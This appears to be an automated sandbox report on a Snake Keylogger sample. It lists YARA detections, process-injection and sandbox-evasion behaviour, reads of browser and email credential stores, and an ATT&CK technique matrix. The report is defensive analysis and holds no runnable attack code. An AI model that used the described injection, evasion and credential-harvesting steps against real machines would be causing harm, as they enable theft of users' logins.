        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.2f53b10.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.2f512e8.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT98765445670009.scr.exe.logJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMutant created: NULL
        Source: PT98765445670009.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: PT98765445670009.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PT98765445670009.scr.exe, 00000002.00000002.3688666945.000000000307C000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003089000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003046000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003055000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3688666945.0000000003037000.00000004.00000800.00020000.00000000.sdmp, PT98765445670009.scr.exe, 00000002.00000002.3689720823.0000000003E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: PT98765445670009.scr.exeReversingLabs: Detection: 50%
        Source: PT98765445670009.scr.exeVirustotal: Detection: 59%
        Source: unknownProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: PT98765445670009.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: PT98765445670009.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: PT98765445670009.scr.exe, GxZCryAUUnpZBQsGErUvCiE.cs.Net Code: Shlyber System.AppDomain.Load(byte[])
        Source: PT98765445670009.scr.exeStatic PE information: 0xF9CC3123 [Sat Oct 21 21:18:27 2102 UTC]
        Source: PT98765445670009.scr.exeStatic PE information: section name: .text entropy: 7.276750369053607
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: Yara matchFile source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599873Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599766Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599655Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599531Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599421Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599284Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599156Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 599046Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598937Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598817Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598359Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 598031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597922Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597339Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 597016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596891Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596781Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596672Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596562Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596453Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596344Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596234Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596125Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 596016Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595906Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595797Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595687Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595572Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595469Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595359Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595250Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595140Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 595031Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594919Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594812Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594703Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594594Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeThread delayed: delay time: 594484Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeWindow / User API: threadDelayed 2216Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeWindow / User API: threadDelayed 7627Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 6684Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep count: 32 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -29514790517935264s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599873s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 3588Thread sleep count: 2216 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 3588Thread sleep count: 7627 > 30Jump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599766s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599655s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599531s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599421s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599284s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599156s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -599046s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598937s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598817s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598687s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598578s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598469s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598359s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598250s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598140s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -598031s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597922s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe TID: 4340Thread sleep time: -597797s >= -30000sJump to behavior
        Source: PT98765445670009.scr.exe, 00000002.00000002.3683807412.000000000113B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Code function: 2_2_052C7988 LdrInitializeThunk,2_2_052C7988
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Process token adjusted: Debug
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: 1.2.PT98765445670009.scr.exe.55c0000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
        Source: 1.2.PT98765445670009.scr.exe.55c0000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs; Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Memory written: C:\Users\user\Desktop\PT98765445670009.scr.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Process created: C:\Users\user\Desktop\PT98765445670009.scr.exe "C:\Users\user\Desktop\PT98765445670009.scr.exe"
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Users\user\Desktop\PT98765445670009.scr.exe VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTR
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

        Remote Access Functionality

        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000002.00000002.3688666945.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTR

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
